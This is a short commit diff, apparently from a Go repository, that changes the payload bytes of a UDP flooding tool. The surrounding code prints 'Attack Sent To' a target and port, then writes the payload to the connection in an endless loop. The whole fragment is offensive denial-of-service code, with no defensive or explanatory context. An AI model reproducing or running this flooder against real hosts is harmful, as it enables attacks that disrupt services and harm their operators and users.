Change the shit hex message
This commit is contained in:
parent
d4f862d1a4
commit
8547771775
1 changed files with 1 additions and 1 deletions
|
@ -15,7 +15,7 @@ func main() {
|
|||
} else {
|
||||
fmt.Println("Attack Sent To " + target + " Using Port " + port + " With udphex!")
|
||||
for {
|
||||
conn.Write([]byte("\x64\x72\x61\x63\x6f\x73\x75\x64\x70\x68\x65\x78"))
|
||||
conn.Write([]byte("\x61\x73\x64"))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
Loading…
Add table
Reference in a new issue